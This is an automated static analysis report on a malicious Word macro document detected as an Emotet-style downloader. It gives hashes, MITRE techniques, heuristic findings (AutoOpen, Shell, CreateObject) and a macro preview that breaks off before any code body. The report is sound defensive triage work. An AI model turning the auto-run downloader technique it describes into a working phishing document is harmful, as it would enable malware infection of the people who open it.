Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 78e9a294117a15bd…

MALICIOUS

Office (OLE)

Size: 190.0 KB
Created: 2018-11-07 02:19:23
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: 0db588c76cb4b0ba5c6467c53c69d86e
SHA-1: f571940792608147fd87fce9008c296d3b8c600a
SHA-256: 78e9a294117a15bd922456559e1550e68e367b98357ec92309fbd10e2801af55
Risk Score: 250

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen subroutine, a common technique for executing code automatically when the document is opened. The macro uses Shell() and CreateObject() calls, which indicates an attempt to download and execute a secondary payload. A ClamAV detection for 'Doc.Malware.Emodldr-6769670-0' further supports the malicious verdict.

Heuristics (8)

  • ClamAV: Doc.Malware.Emodldr-6769670-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-6769670-0
  • VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://www.iec.ch (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 45751 bytes
SHA-256: 44577d6f88a3fde9027101d9e2143b3b8fbf55803e553d70a73e9767f8dc0dfd

Preview of the extracted script (first 1,000 lines)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub AutoOpen()
... (truncated)